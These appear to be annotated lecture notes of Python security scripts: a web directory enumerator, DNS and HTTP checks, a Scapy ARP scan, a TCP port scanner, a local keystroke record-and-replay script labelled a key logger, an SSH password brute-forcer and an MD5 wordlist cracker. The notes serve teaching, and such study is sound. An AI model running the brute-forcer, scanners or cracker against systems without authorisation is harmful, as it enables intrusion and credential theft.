Lecture 9 Python Script


Python script that performs directory enumeration on a web server using a wordlist


import requests
import sys
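# Load the candidate names once; the context manager closes the file handle,
# which the bare open(...).read() in the printed listing never did.
with open("wordlist.txt") as wordlist_file:
    directories = wordlist_file.read().splitlines()

for name in directories:
    # Each candidate is requested as http://<host>/<name>.html, so despite the
    # "directory" wording this only tests for .html pages at the web root.
    dir_enum = f"http://{sys.argv[1]}/{name}.html"
    try:
        # Bound every request: without a timeout a single stalled connection
        # blocks the whole run indefinitely.
        r = requests.get(dir_enum, timeout=5)
    except requests.RequestException as exc:
        print("Request failed:", dir_enum, exc)
        continue
    # Anything other than 404 is reported. That includes 403, 5xx and custom
    # error pages that answer 200, so every hit needs manual confirmation.
    # In the server's access log this run shows up as a series of 404s for
    # wordlist names from a single client address.
    if r.status_code != 404:
        print("Valid directory:", dir_enum)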

This script attempts to enumerate subdomains by resolving DNS records and then checks whether these subdomains are accessible over HTTP.
import sys

import dns.resolver
import requests
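def enumerate_subdomains(base_domain):
    """Resolve the A records of ``base_domain`` and return their addresses.

    Despite its name, this function does not discover subdomains: it issues a
    single A query for exactly the name it is given and returns what that
    query answers.

    Args:
        base_domain: DNS name to resolve.

    Returns:
        A list of IPv4 address strings, empty when the name does not exist.
    """
    subdomains = []
    try:
        answers = dns.resolver.resolve(base_domain, 'A')
        for rdata in answers:
            # A rdata carries its IPv4 address in ``address``. ``target`` only
            # exists on record types that point at another name (CNAME, for
            # example), so reading it here raised AttributeError on every
            # successful lookup.
            subdomains.append(rdata.address)
    except dns.resolver.NXDOMAIN:
        print(f"No DNS record found for {base_domain}")
    return subdomains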

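# Exactly one argument is expected: the name handed to enumerate_subdomains().
if len(sys.argv) != 2:
    print("Usage: python script.py <base_domain>")
    sys.exit(1)

base_domain = sys.argv[1]
subdomains = enumerate_subdomains(base_domain)

for sub in subdomains:
    # Only plain HTTP on the default port is tried; a host that serves HTTPS
    # only is silently treated as unreachable.
    sub_domain = f"http://{sub}"
    try:
        # The timeout keeps one unresponsive host from hanging the loop.
        response = requests.get(sub_domain, timeout=5)
    except requests.RequestException:
        # Covers refused connections as well as the timeout added above,
        # which requests.ConnectionError alone would not catch.
        continue
    # requests follows redirects by default, so this is the status of the
    # final page rather than of the first response.
    if response.status_code == 200:
        print("Valid domain:", sub_domain)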

This script appears to enumerate directories by checking whether specific URLs are valid, based on the HTTP response code.
import requests
import sys

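def enumerate_directories(base_url, directory_list):
    """Return the candidate URLs under ``base_url`` that do not answer 404.

    Each entry of ``directory_list`` is requested as
    ``<base_url>/<entry>.html``. Every status other than 404 counts as a hit,
    so 403, 5xx and "soft 404" pages that answer 200 are all included; the
    result is a list of candidates to verify, not a list of confirmed paths.

    Args:
        base_url: Scheme and host (for example ``http://host``), without a
            trailing slash.
        directory_list: Iterable of names to try; blank entries are skipped.

    Returns:
        List of the URLs whose response status was not 404.

    Raises:
        requests.RequestException: If a request fails or exceeds the timeout.
    """
    valid_directories = []

    for directory in directory_list:
        # A blank wordlist line would otherwise probe "<base_url>/.html".
        if not directory.strip():
            continue

        dir_url = f"{base_url}/{directory}.html"
        # Bound each request so a stalled connection cannot hang the scan.
        response = requests.get(dir_url, timeout=5)

        if response.status_code != 404:
            valid_directories.append(dir_url)

    return valid_directories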

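# Exactly one argument is expected: the base URL to prepend to every entry.
if len(sys.argv) != 2:
    print("Usage: python script.py <base_url>")
    sys.exit(1)

base_url = sys.argv[1]

# Read the wordlist inside a context manager so the handle is closed; the
# printed listing left the file object from open() dangling.
with open("wordlist.txt") as wordlist_file:
    directory_list = wordlist_file.read().splitlines()

valid_directories = enumerate_directories(base_url, directory_list)

for valid_dir in valid_directories:
    print("Valid directory:", valid_dir)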

Using Scapy to perform an ARP scan within a specified IP range


from scapy.all import *

# Scan parameters.
# NOTE(review): "10.10.X.X/24" is a placeholder as printed, not a parseable
# network; it has to be replaced with a real CIDR before the script can run.
interface = "eth0"
ip_range = "10.10.X.X/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"

# ARP who-has for the addresses in ip_range, carried in an Ethernet frame sent
# to the broadcast MAC. ARP is not routed, so only hosts on the interface's
# own broadcast domain can answer.
arp_request = ARP(pdst=ip_range)
packet = Ether(dst=broadcastMac) / arp_request

# srp() sends and receives at layer 2 and returns (answered, unanswered).
# inter=0.1 spaces the requests 0.1 s apart; on the wire the run is a burst of
# who-has requests from a single source MAC.
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)

# Each answered entry is a (sent, received) pair; print the responder's MAC
# and the IP address it claims.
for _sent, reply in ans:
    print(reply.sprintf(r"%Ether.src% - %ARP.psrc%"))

Port Scanner
import sys
import socket
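def probeport(ip, port, result = 1):
    """Attempt a TCP connect to ``ip``:``port`` and report whether it succeeded.

    Args:
        ip: Target IPv4 address or host name.
        port: TCP port number.
        result: Value returned when the connection does not succeed
            (defaults to 1).

    Returns:
        0 when ``connect_ex()`` reports success, otherwise ``result``.
    """
    try:
        # The context manager closes the socket on every path. Previously an
        # exception raised by connect_ex() (bad port number, name resolution
        # failure) skipped sock.close() and leaked the descriptor.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(0.5)
            # connect_ex() returns an errno-style code instead of raising for
            # ordinary connection failures; 0 means the handshake completed.
            if sock.connect_ex((ip, port)) == 0:
                result = 0
    except Exception:
        # Deliberately best-effort, as in the original: any failure to probe
        # is reported as "not open" rather than raised to the caller.
        pass
    return result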

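# Scan parameters come first. In the listing as printed they followed the
# loop that reads them, so the script stopped with NameError on its first line.
ip = '192.168.1.6'
# The printed listing assigns range(1, 65535) (which stops at 65534) and then
# immediately overwrites it with this set, so only these ports are probed.
ports = { 137, 139, 23, 53, 80, 135, 443, 445}
open_ports = []

for port in ports:
    sys.stdout.flush()
    # The helper is defined as probeport(); the listing called probe_port,
    # a name that does not exist anywhere in it.
    response = probeport(ip, port)
    # probeport() returns 0 only when the TCP handshake completed. A connect
    # scan therefore creates a full connection per open port, which is
    # visible in the target's connection logs.
    if response == 0:
        open_ports.append(port)

if open_ports:
    print ("Open Ports are: ")
    print (sorted(open_ports))
else:
    print ("Looks like no ports are open :(")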

Key Logger
import keyboard
# record() blocks and collects keyboard events until 'ENTER' is pressed.
# Despite the heading, nothing here is written to disk or sent anywhere: the
# events exist only in this process.
recorded_events = keyboard.record(until ='ENTER')
# play() replays the recorded events as synthetic key presses.
keyboard.play(recorded_events)

bruteforce an SSH server using the Paramiko library in Python


import paramiko

# input() already returns str, so no conversion is needed; the prompts are
# unchanged. All three values are read by the code further down as globals.
target = input('Please enter target IP address: ')
username = input('Please enter username to bruteforce: ')
password_file = input('Please enter location of the password file: ')

def ssh_connect(password):
    """Make one password login attempt against the global ``target``.

    Reads the module-level ``target`` and ``username`` and always uses port 22.

    Args:
        password: Candidate password to try.

    Returns:
        True when authentication succeeds, False when the server rejects the
        password, and None when any other exception occurs (the exception is
        printed and otherwise ignored).
    """
    client = paramiko.SSHClient()
    # AutoAddPolicy accepts whatever host key the server presents, without
    # verification.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    # Each call opens a fresh connection and makes a single attempt, so on the
    # server a run appears as a sequence of failed password logins for one
    # user from one address, the pattern that rate limiting and lockout
    # tooling keys on.
    verdict = None
    try:
        client.connect(target, port=22, username=username, password=password)
        print('Password found: ' + password)
        verdict = True
    except paramiko.AuthenticationException:
        print('Incorrect password: ' + password)
        verdict = False
    except Exception as err:
        # Network and protocol errors land here; verdict stays None, which
        # callers testing truthiness cannot tell apart from a wrong password.
        print(err)
    finally:
        client.close()
    return verdict

# Walk the wordlist one line at a time, stripping surrounding whitespace.
with open(password_file, 'r') as wordlist:
    for password in map(str.strip, wordlist):
        # ssh_connect() returns None on connection errors; that is falsy, so
        # such a candidate is skipped exactly like a rejected password.
        if ssh_connect(password):
            exit(0)

# Reached only when no candidate returned True.
print('Password not found in the provided wordlist.')

script to crack an MD5 hash using a wordlist


import hashlib

# input() already returns str; the prompts are unchanged.
wordlist_location = input('Enter wordlist file location: ')
hash_input = input('Enter hash to be cracked: ')

# One MD5 computation per candidate is enough because the hash is unsalted and
# fast to compute. Salted, deliberately slow password hashes (bcrypt, scrypt,
# Argon2) make every guess per-account and expensive.
with open(wordlist_location, 'r') as file:
    for line in file:
        candidate = line.strip()
        hashed_pass = hashlib.md5(candidate.encode()).hexdigest()
        # hexdigest() is lowercase and the comparison is exact, so an
        # uppercase or whitespace-padded hash_input never matches.
        if hashed_pass == hash_input:
            print('Found cleartext password! ' + candidate)
            exit(0)
# Nothing is printed when the wordlist is exhausted without a match.
